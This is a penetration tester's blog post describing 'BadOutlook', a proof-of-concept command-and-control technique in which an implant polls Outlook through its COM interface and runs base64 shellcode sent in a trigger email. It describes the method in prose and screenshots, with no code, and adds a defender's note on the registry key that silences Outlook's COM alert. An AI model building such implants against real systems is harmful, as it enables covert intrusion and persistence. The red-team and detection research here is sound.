BadOutlook for C2

BadOutlook is a command and control (C2) technique that leverages Microsoft Outlook’s COM interface for communication.

 

There are a handful of ways to detect malware, including antivirus (AV), endpoint detection and response (EDR) and network analysis. As a result, researchers spend a lot of time looking for ways to evade AV and EDR detection, from unhooking to the usage of more exotic API calls. This is in addition to research looking at new ways of defeating network detection techniques and finding evasive communication channels. With respect to network evasion, much public research explores the usage of websites, custom protocols and so on. What is the constant in these situations? Implants (i.e. your malicious code) either opens a port on the target system or makes outbound communication to the command and control servers. One technique rarely explored is C2 without direct network communication. The challenge now becomes how to send commands to our implant without having to communicate with it directly.

 

 

Concept

According to Microsoft, the Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's Object Linking & Embedding (OLE) and ActiveX (Internet-enabled components) technologies. In other words, COM is simply a way for two programs to talk to each other. Have you ever embedded an Excel spreadsheet inside of a Word document? This is a common scenario in which COM was designed to perform. Numerous Microsoft products possess COM interfaces that allow other applications to interact with them. This includes Word, Excel and the subject of this blog, Outlook.

 

Outlook has a COM interface which, according to the documentation, “Represents the entire Outlook application.” The Outlook COM interface allows programs to do anything from checking mailboxes and calendars to sending emails. To state this simply, anything an end user can do in the main graphical user interface (GUI), can also be executed through the COM interface. This post explores how I built an implant that monitors the Outlook client for C2 instructions while not requiring external (e.g. Internet) communication to operate.

 

 

Proof of Concept

BadOutlook leverages the COM interface to poll the specified Outlook folder at a predetermined interval. In this example, we poll the Inbox folder every 10 seconds to look for the subject line “testtesttest2.” Once BadOutlook identifies the triggered subject line, it will read the content of the email body containing base64 encoded shellcode and execute it. This proof of concept within itself is not intended to be fully evasive, but rather is a new method that can be utilized in your malware development.

 

Additionally, Matthew Eidelberg’s research can be used to execute this technique evasively. Below you can find screenshots of the tool in action:

 

Image
badoutlook_img1

Figure 1: Polling the Outlook Client for the Trigger Subject Line

 

 

Image
badoutlook_img2

Figure 2: Email Containing the Trigger Subject Line and Base64 Encoded shellcode

 

 

Image
badoutlook_img3

Figure 3: Trigger Email in Inbox Awaiting Execution

 

 

Image
badoutlook_img4

Figure 4: Trigger Email and Shellcode Executed Resulting in an Interactive Command Prompt

 

Given the functionality available in Office products, its possible for adversaries to leverage Outlook's COM interface in attacks for extended persistence. As the implant does not require traditional outbound communication for its instructions (e.g. POST calls), blue teams may struggle with network-based detections. Outlook does produce an alert when outside programs attempt to leverage the COM interface and access Outlook. Organizations should consider configuring rules or checks to identify instances where the registry key exists to disable this alerting functionality.

 


References:

Ali S. Ahmad
Ali S. Ahmad | Consultant II
Ali Ahmad is a Security Consultant in Optiv’s Threat Management Team (Attack and Penetration specialization). His primary roles include executing of perimeter and internal network penetration tests and research and development of windows malware samples.